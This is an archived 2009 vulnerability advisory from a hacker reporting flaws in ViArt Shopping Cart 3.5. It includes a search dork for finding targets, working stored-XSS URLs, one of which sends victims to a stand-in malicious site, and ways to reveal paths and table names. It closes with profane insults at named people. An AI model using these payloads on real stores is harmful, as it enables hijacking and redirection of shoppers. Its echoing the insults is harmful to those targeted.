ViArt Shopping Cart 3.5 XSS / Info Disclosure

2009-01-01T00:00:00
ID PACKETSTORM:73517
Type packetstorm
Reporter Florinu
Modified 2009-01-01T00:00:00

Description

                                        
                                            `==============================================================  
ViArt Shopping Cart v3.5 is multiple remote vulnerbalities  
(maybe anathor version)  
==============================================================  
*********************************************************************************************************************  
--==Author==-- : Florinu  
--==E-mail==-- : djflorinu@yahoo.com -don`t add to your messenger :)))  
--==Gretz to==-- : Romanian hackers , my friend sisqo , and all #edu @undernet members cinu , van etc..  
--==Reason==-- : OB3zu is still fat and ugly  
--==Dork==-- : intext:"Free Ecommerce Shopping Cart Software by ViArt" +"Your shopping cart is empty!" + "Products Search" +"Advanced Search" + "All Categories"  
--==Script==-- : http://www.viart.com/  
**********************************************************************************************************************  
  
PART 1 . - Full Path Disclosure  
Risk Low  
Attackers can use this vulnerability to leverage another attack after the full path has been disclosed.  
  
Exemple 1 - Full Path Disclosure  
The server will give an error when any URL real/imaginary is passed to the POST_DATA parameter:  
http://www.victim.com/manuals_search.php?POST_DATA=http://site-that-does-not-exist.com  
A remote user is able to identify the full path of the document root folder.  
  
PART 2 . - Information Disclosure  
Risk Medium  
The table names can be further leveraged for a SQL injection if one exists.  
  
Example 2 - Information Disclosure When a user is not signed in, the tables are shown to the attacker via an error, because the PHP form fails to properly sanitize user_id since the user is not logged in. The attacker must first try to add a product to the cart and then save the shopping cart for the tables to be revealed by browsing to:  
  
http://www.victim.com/cart_save.php  
  
PART 3 . - Arbitrary Code Injection  
Risk High  
Attackers can use this vulnerability to execute arbitrary code on a legitimate user.  
  
Example 3 - Arbitrary Code Injection  
The attacker is able to create shopping carts with HTML/Javascript injected code such as:  
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><ahref="http://www.google.com">Google</a></html>  
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>alert("VULN");</script></html>  
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://malicious-site.com";</script></html>  
*** Blink Blink *** Then when the user visits "My Saved Carts" at http://victim.com/user_carts.php the code is executed:  
Trick 1 would give a link to the Google search engine.  
Trick 2 would give a javascript alert popup displaying "VULN".  
Trick 3 would send the user to a malicious site.  
*** Note: manuals_search.php is also vulnerable to the same HTML/Javascript vulnerability that allows for arbitrary code to be executed:  
http://www.victim.com/manuals_search.php?manuals_search=<html><script>window.location="http://malicious-site.com";</script></html>  
A remote user is able to identify the full path of the document root folder.  
  
Description :  
The Cart name is all that needs to be guessed/brute-forced for an attacker to gain entry to the shopping cart. As the cart-id increments from 1 upwards. This does not require any user-login from the attacker. An attacker could also overload the server with a ton of shopping carts by constantly refreshing cart_save.php to create multiple shopping cart ID's.  
  
Solution :  
ViArt Shopping Cart can still be used, but be wary of the full path disclosure and make sure no SQL injections can take placeonce an attacker knows the table names. Alert users that they should be wary of which links they click on as an attacker could redirect them to a malicious site. The overloading of cart_save.php can be solved by placing IP-bans on attackers. There is no solution to the brute-force guessing of cart names.  
The vendor has not yet been notified.  
  
  
!!!!!!!!!!! some reason from me !!!!!!!!!!!!!!!  
  
- fuck EMO syle  
- fuck the pigy boy Ob3zu (is still fat and ugly)  
- Stefan cel Mare is the best  
- we love manele :))) ( guta , salam )  
\\\\\\\\\\\\\\\\\ in memory of the old (SV) [ :))) ] school //////////////////////  
NICKNAME : cho-can , blizzard , harbuz , devil , sisqo , Atody , blizzard , seth , bontan , tzi . tzipex , Ares, buracutz (brothers) , florinel , kobras , j0ker Bigbad ( a b00m @ gamespit ) and all the rest (:)  
  
==============>>>>>> Selektiv was a lamer  
  
  
`